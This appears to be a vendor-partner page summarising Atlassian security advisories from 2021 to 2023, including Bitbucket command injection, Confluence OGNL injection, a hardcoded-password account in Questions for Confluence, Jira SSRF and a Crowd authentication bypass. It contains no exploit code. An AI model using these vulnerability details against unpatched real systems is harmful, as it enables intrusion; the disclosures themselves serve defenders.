Atlassian Security Updates (CVE)

Februar 2023

Atlassian rates the severity level of this vulnerability as critical.

Information

Git Buffer Overflow in Multiple Products.

Affected Products

    • Bitbucket Server and Data Center

    • Bamboo Server and Data Center

    • Fisheye

    • Crucible

    • Sourcetree

 

January 2023

Atlassian rates the severity level of this vulnerability as critical.

Information

This advisory discloses a critical severity security vulnerability which was introduced in version 5.3.0 of Jira Service Management Server and Data Center. The following versions are affected by this vulnerability:

  • 5.3.0

  • 5.3.1

  • 5.3.2

  • 5.4.0

  • 5.4.1

  • 5.5.0

An authentication vulnerability was discovered in Jira Service Management Server and Data Center which allows an attacker to impersonate another user and gain access to a Jira Service Management instance under certain circumstances. With write access to a User Directory and outgoing email enabled on a Jira Service Management instance, an attacker could gain access to signup tokens sent to users with accounts that have never been logged into. Access to these tokens can be obtained in two cases:

  • If the attacker is included on Jira issues or requests with these users, or

  • If the attacker is forwarded or otherwise gains access to emails containing a “View Request” link from these users.

Bot accounts are particularly susceptible to this scenario. On instances with single sign-on, external customer accounts can be affected in projects where anyone can create their own account.

Affected Products

  • Jira Service Management Server

  • Jira Service Management Data Center

 

November 2022

Atlassian rates the severity level of this vulnerability as critical.

Information

This advisory discloses a critical-severity security misconfiguration vulnerability, which was introduced in Crowd 3.0.0. All versions released after 3.0.0 are affected but only if both of the following conditions are met:

  • the vulnerability concerns only new installations of affected versions: if you upgraded from an earlier version, for example version 2.9.1, to version 3.0.0 or later, your instance is not affected.

    • A new installation is defined by an instance of Crowd that is the same version that you originally downloaded from the downloads page and has not been upgraded since

  • an IP address has been added to the Remote Address configuration of the crowd application (which is none by default in versions after 3.0.0)

The vulnerability allows an attacker connecting from IP in the allow list to authenticate as the crowd application through bypassing a password check. This would allow the attacker to call privileged endpoints in Crowd’s REST API under the usermanagement path.

Affected products

  • Crowd Server and Data Center
 

Atlassian rates the severity level of this vulnerability as critical.

Information

This advisory discloses a critical severity security vulnerability introduced in version 7.0.0 of Bitbucket Server and Data Center. The following versions are affected by this vulnerability:

  • Bitbucket Data Center and Server 7.0 to 7.21

  • Bitbucket Data Center and Server 8.0 to 8.4 if mesh.enabled is set to false in bitbucket.properties

There is a command injection vulnerability using environment variables in Bitbucket Server and Data Center. An attacker with permission to control their username can exploit this issue to gain code execution and execute code on the system.

Affected products

  • Bitbucket Server

  • Bitbucket Data Center

 

August 2022

Critical severity command injection vulnerability and was released at, 24 Aug 2022​

Information

This advisory discloses a critical severity security vulnerability which was introduced in version 7.0.0 of Bitbucket Server and Data Center. All versions released after 6.10.17 including 7.0.0 and newer are affected, this means that all instances that are running any versions between 7.0.0 and 8.3.0 inclusive are affected by this vulnerability.

There is a command injection vulnerability in multiple API endpoints of Bitbucket Server and Data Center. An attacker with access to a public repository or with read permissions to a private Bitbucket repository can execute arbitrary code by sending a malicious HTTP request.

Affected products

All versions of Bitbucket Server and Datacenter released after 6.10.17 including 7.0.0 and newer are affected, this means that all instances that are running any versions between 7.0.0 and 8.3.0 inclusive are affected by this vulnerability.
 

July 2022

This vulnerability should be remediated on affected systems immediately and was released at, 20 Jul 2022 and has already been updated

Information

A Servlet Filter is Java code that intercepts and processes HTTP requests before a client request is sent to a back end resource. They’re also used to intercept and process HTTP responses from a back end resource before they’re sent to a client. Some Servlet Filters provide security mechanisms such as logging, auditing, authentication, or authorization.

Affected products

  • Bamboo Server and Data Center
  • Bitbucket Server and Data Center
  • Confluence Server and Data Center
  • Crowd Server and Data Center
  • Fisheye and Crucible
  • Jira Server and Data Center
  • Jira Service Management Server and Data Center
 

This vulnerability should be remediated on affected systems immediately and was released at, 20 Jul 2022 and has already been updated​

Information

When the Questions for Confluence app is enabled on Confluence Server or Data Center, it creates a Confluence user account with the username disabledsystemuser. This account is intended to aid administrators that are migrating data from the app to Confluence Cloud. The disabledsystemuser account is created with a hardcoded password and is added to the confluence-users group, which allows viewing and editing all non-restricted pages within Confluence by default. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access any pages the confluence-users group has access to.

Affected products

Questions For Confluence app for:

  • Confluence Server
  • Confluence Data Center
 

June 2022

This advisory discloses a high severity security vulnerability was released at, June 29, 2022 and has already been updated​

Information

A full-read server-side request forgery exists in Mobile Plugin for Jira, which is bundled with Jira and Jira Service Management. It is exploitable by any authenticated user (including a user who joined via the sign-up feature). It specifically affects the batch HTTP endpoint used in Mobile Plugin for Jira. It is possible to control the HTTP method and location of the intended URL through the method parameter in the body of the vulnerable endpoint.

Affected products

  • Jira Core Server
  • Jira Software Server
  • Jira Software Data Center
  • Jira Service Management Server
  • Jira Service Management Data Center
Jira Versions Versions after 8.0 and before 8.13.22 and Jira Service Management Versions Versions after 4.0 and before 4.13.22.
 

A new ‘Critical’ vulnerability was released at, June 2, 2022 and has already been updated​.

Information

Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance. 

Affected products

  • All versions of Confluence Server and Data Center prior to the fixed versions listed above are affected by this vulnerability.

A new ‘High’ vulnerability was released at, November 1, 2021. 

Information

Multiple Atlassian products use the third-party Log4j library, which is vulnerable to CVE-2021-44228:

Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled

Affected products

  • Bitbucket

November 2021

A new ‘High’ vulnerability was released at, November 1, 2021. 

Severity

Atlassian rates the severity level of this vulnerability as high, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Affected products

  • Bamboo Server and Data Center

  • Bitbucket Server and Data Center

  • Confluence Server and Data Center

  • Crucible

  • Fisheye

  • Jira Service Management Server and Data Center (and Insight Asset Management app)

  • Jira Software Server and Data Center (including Jira Core)

  • Jira and Confluence Server mobile apps

Description

A vulnerability has been identified affecting multiple Atlassian products where special characters, known as Unicode bidirectional override characters, are not rendered or displayed in the affected applications. These special characters are typically not displayed by the browser or code editors but can affect the meaning of the source code when it is processed by a compiler or an interpreter.

Acknowledgements

The issue was identified and reported by Nicholas Boucher and Ross Anderson of the University of Cambridge. 

 

October 2021

A new ‘Critical’ vulnerability was released at, 20th Oct 2021.​

Severity

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate, or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Affected products

  • Insight – Asset Management app

  • Jira Service Management Data Center and Server

Description

Insight – Asset Management has a feature to import data from several databases (DBs). One of these DBs, the H2 DB, has a native function in its library which an attacker can use to run code on the server (remote code execution a.k.a. RCE). The H2 DB is bundled with Jira to help speed up the setup of Jira test environments.

The combination of the DB import feature introduced by Insight – Asset Management with the existing Jira H2 DB library exposed this vulnerability. The vulnerability exists whether or not the import configuration was saved and even if H2 was never used as a targeted DB. Accessing this vulnerability requires the following:

The user must be an authenticated Jira user AND
Either of the following privileges within Insight – Asset Management:

  • user or group permission to “Insight administrator”
  • user or group permission to “Object Schema Manager”

August 2021

A new ‘Critical’ vulnerability was released at, 25th August 2021.​

Severity

This vulnerability is being actively exploited in the wild.
Affected servers should be patched immediately.

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Affected products

  • Confluence Server

  • Confluence Data Center

Description

An OGNL injection vulnerability exists that would allow an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance. 

All versions of Confluence Server and Data Center prior to the fixed versions listed above are affected by this vulnerability.

Acknowledgements

The issue was discovered by Benny Jacob (SnowyOwl) via the Atlassian public bug bounty program.